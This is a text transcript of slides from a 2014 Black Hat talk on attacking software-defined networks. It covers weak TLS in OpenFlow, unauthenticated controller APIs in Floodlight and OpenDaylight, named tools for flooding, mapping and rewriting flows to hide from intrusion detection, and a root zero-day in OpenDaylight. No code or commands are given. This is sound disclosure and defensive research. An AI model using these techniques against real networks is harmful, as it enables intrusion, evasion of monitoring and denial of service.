abusing software defined networks - black hat briefings · pdf file ·...
TRANSCRIPT
Black hat Europe 2014, Amsterdam
Abusing Software Defined Networks
Overview
What is it?Exploiting it!Fixing it!Moving ForwardWrapping Up
Modern Day Networks
Vendor DependentDifficult to scaleComplex and Prone to BreakDistributed and Often InconsistentConfigurationUses inflexible and difficult to innovateprotocolsUnable to Consider Other Factors
… And Good Luck If You WantTo Change It!
Enter … Software Defined Networking
Separate the Control and Data PlaneForwarding Decisions Made By a ControllerSwitches and Routers Just Forward Packets
ControllersProgrammed with the IntelligenceFull visibility of the NetworkCan consider the totality of the networkbefore making any decisionEnforce Granular Policy
Enter … Software Defined Networking
SwitchesBare-Metal OnlyAny Vendor … Hardware or Software
Solves Lots of Problems
Less Expensive HardwareWith BGP
Maintenance Dry-OutCustomer Egress SelectionBetter BGP SecurityFaster ConvergenceGranular Peering at IXPs
Expands Our Capability
Real-World Network Slicing of Flow SpaceNetwork and Server Load BalancingSecurity
Dynamic Access ControlAdaptive Traffic MonitoringAttack Detection and Mitigation
Emerging Standards
Old and BustedSNMPBGPNetconfLISPPCEP
New HotnessOVSDBOpenflow
Introducing Openflow
Establishes ElementsControllerSecure ChannelForwarding Element
Defines …Forwarding ProcessMessaging Format
Introducing Openflow
Forwarding ProcessCheck Flow TableIf Match Found, Execute ActionIf No Match, Send Packet to controllerUpdate Flow Table
Flow TablesMatch/Action Entries12 fields available for matchingWildcard matching available
Introducing Openflow
Leading Platforms
ProprietaryCisco Application Policy Infrastructure Controller (APIC)Cisco Extensible Network Controller (XNC)HP Virtual Application Networks (VAN) SDN ControllerIBM Programmable Network Controller
Open-SourceNox/PoxRyuFloodlightOpendaylight
Floodlight
Open-Source Java ControllerPrimarily an Openflow-based controllerSupports Openflow v1.0.0Fork from the Beacon Java Openflow controllerMaintained by Big Switch Networks
Opendaylight
Open-Source Java ControllerMany southbound options including OpenflowSupports Openflow v1.0.0 and v1.3.0Fork from the Beacon Java Openflow controllerA Linux Foundation Collaborative ProjectSupported by Citrix, Red Hat,Ericsson, Hewlett Packard,Brocade, Cisco, Juniper,Microsoft, and IBM
So It’s Gonna Be All …
Not Exactly!
Protocol Weaknesses
Encryption and Authentication via TLSMore of a suggestion than a requirement though …
Started Out GoodHeading Backwards
v1.0.0 over TLSv1.4.0 over TCP or TLS
Protocol Weaknesses
ControllersFloodlight … NopeOpendaylight … Supported but not required
SwitchesArista … NoBrocade … Surprisingly, YesCisco … Another, YesDell … NoExtreme … Another, YesHP … No
Protocol Weaknesses
SwitchesHuawei … NoIBM … NoJuniper … NoNEC … Another, YesNetgear … NoPronto … YesOVS … No
Could Lead To …
Information Disclosure through InterceptionModification through Man-in-the-MiddleAnd all sorts of DoS Nastiness!
DoS Nastiness
OpenflowCentralization Entails DependencyDependency Can Be ExploitedHow are vendors handing it?
FloodlightExplored by Solomon, Francis, and EitanTheir Results … Handling It Poorly
OpendaylightUnknown but worth investigatingIt is Java for God Sake!
Tools
of-switch.pyImpersonates an Openflow switchUtilizes Openflow v1.0.0
of-flood.pyFloods an Openflow controllerDisrupting the network and bringing it downUtilizes Openflow v1.0.0
Debug Ports
No EncryptionNo AuthenticationJust Full Control of the SwitchAll Via “dpctl” command-linetoolNot a problem yet …But Soon Will Be!
Controller Weaknesses
FloodlightNo Encryption for Northbound HTTP APINo Authentication for Northbound HTTP API
OpendaylightEncryption for Northbound HTTP API
Turned Off by DefaultAuthentication for Northbound HTTP API
HTTP Basic AuthenticationDefault Password WeakStrong Passwords Turned Offby Default
Could Lead To …
Information Disclosure through InterceptionTopologyCredentials
Information Disclosure throughUnauthorized Access
TopologyTargets
And …
Topology, Flow, and Message Modification throughUnauthorized Access
Add AccessRemove AccessHide TrafficChange Traffic
Identifying Controllers and Switches
Currently Listening on TCP Port 6633New Port Defined … TCP Port 6653Hello’s ExchangedFeature Request
Controller will sendSwitch will not
Tools
of-check.pyIdentifies Openflow ServicesReports on their VersionsCompatible with any version of Openflow
of-enum.pyEnumerates Openflow EndpointsReports on their TypeCompatible with any version of Openflow
Tools
of-enum.nseEnumerates Openflow EndpointsReports on their TypeCompatible with any version of Openflow
Demonstration
Some Attacks
Small Local Area NetworkOne Admin HostTwo User HostsOne ServerOne IDS
Attacker will …Identify TargetsEnumerate ACLsFind Sensors
Tool
of-map.pyDownloads flows from an Openflow controllerUses the flows
To identify targets and target servicesTo build ACLsTo identify sensors
Works with Floodlight and Opendaylightvia JSON
Demonstration
And Some More Attacks …
Small Local Area NetworkOne Admin HostTwo User HostsOne ServerOne IDS
Attacker will …Gain Access to the ServerIsolate the AdministratorHide from the IDSAnd Attack the Server
Tool
of-access.pyModifies flows on the network throughthe Openflow Controller
Adds or Removes access for hostsApplies transformations to theirnetwork activityHides activity from sensors
Works with Floodlight and Opendaylightvia JSON
Demonstration
And Now Some Pwnage …
Sorry Linux Foundation!
Zero-Day Exploit
Opendaylight has other southbound APIs besides OpenflowNo Encryption for Southbound Netconf APINo Authentication for Southbound Netconf API
Just Connect and Exchange MessagesXML-RPCRemember Java?
Boom Goes OpendaylightAnd it runs as “Root”
Demonstration
If No Exploit …
Service Not Available or They Fix ItNot to WorryPassword Guess the !!!!!!
Default Password WeakStrong Passwords Turned OffNo Account LockoutNo SYSLOG Output
Repeat!
Attacker will …Identify TargetsEnumerate ACLsFind SensorsGain Access to the ServerIsolate the AdministratorHide from the IDSAnd Attack the Server
And Pwn That Network Too!
Other Exploits Waiting to Be Found!
FloodlightNorthbound HTTP APISouthbound Openflow API
OpendaylightNorthbound HTTP APISouthbound Openflow APISouthbound Netconf API (TCP,SSH)Southbound Netconf Debug Port
Other Exploits Waiting to Be Found!
OpendaylightJMX AccessOSGi ConsoleLisp Flow MappingODL Internal Clustering RPCODL ClusteringJava Debug Access
Available Solutions
For NowFor the Future
For Now
Transport Layer SecurityFeasible?Realistic?
Hardening … Duh!VLAN … It’s the Network Stupid!Code Review Anyone?
For the Future
Denial of Service (SDN Architecture)Network PartitioningController ClusteringStatic Flow Entries
Modification (SDN Applications)Traffic CountersRespond to Abnormalities
Verification (SDN Operations)
How Prevalent Is It Going To Be?
Gartner: 10 critical IT trends for the next fiveyearsMajor Networking Vendors Have Products orProducts Planned for SDNInformationWeek 2013 Survey
60% felt that SDN would be part oftheir network within 5 Years43% already have plans to put it inproduction
Reported
While Data Centers/Clouds are the Killer App for SDNNIPPON EXPRESSFIDELITY INVESTMENTSVMWARE
Starting to see it moving toward theLAN
CaltechCern
And WANGoogle, NTT, and AT&T
How It Could Go Right
Vendor Independence and ultimately lower costNetworks that match the application and thebusinesses needs not the other way aroundFaster Evolution of the Network
Production-Scale Simulationand ExperimentationExchangeable Network Aspects
Dynamic and Truly ActiveDefenses
How It Could Go Wrong
Denial of ServicePeer NodeExternal NodeSelectively Dropping Traffic?
MiTMEntire NetworksLocal Subnets or Hosts
Shadow OperationsDarknetsUber Admins
Making the Difference
Traditional Means of Securing Controllers Still ApplySecurity Needs to Be Part of the Discussion
Until Now … How SDN Can Help SecurityBut How Secure is SDN?
Analyses being DoneBut By OutsidersTraditional Approach and 2-D
Controller’s Need A SecurityReference and Audit Capability
SDN has the potential to turn the entire Internetinto a cloudBenefit would be orders of magnitude above whatwe see nowBut there is hole in the middle of it that couldeasily be filled by the likes of the NSA … orworse yet, ChinaLet’s Not Let That HappenAnd That Start’s Here
Final Thoughts
Toolkit
SHA1 hash is 5de4f56de0ce24cc5b4fcd691ff4e7e910e0b80bUpdates can be found at http://www.hellfiresecurity.com/
Linkshttp://www.sdncentral.com/https://www.opennetworking.org/http://www.projectfloodlight.org/http://www.opendaylight.org/https://www.coursera.org/course/sdnhttps://www.baycollege.edu/Academics/Areas-of-Study/Computer-Network-Systems/Faculty/Linderoth/2013-sdn-survey-growing-pains.aspxhttp://h17007.www1.hp.com/docs/reports/2013-Infonetics-Enterprise-SDNs-07-10-13.pdfhttp://www.openflowhub.org/blog/blog/2012/12/03/sdn-use-case-multipath-tcp-at-caltech-and-cern/http://www.networkworld.com/article/2167166/cloud-computing/vmware--we-re-building-one-of-the-biggest-sdn-deployments-in-the-industry.htmlhttp://www.networkcomputing.com/networking/inside-googles-software-defined-network/a/d-id/1234201?http://cseweb.ucsd.edu/~vahdat/papers/b4-sigcomm13.pdfhttp://viodi.com/2014/03/15/ntt-com-leads-all-network-providers-in-deployment-of-sdnopenflow-nfv-coming-soon/
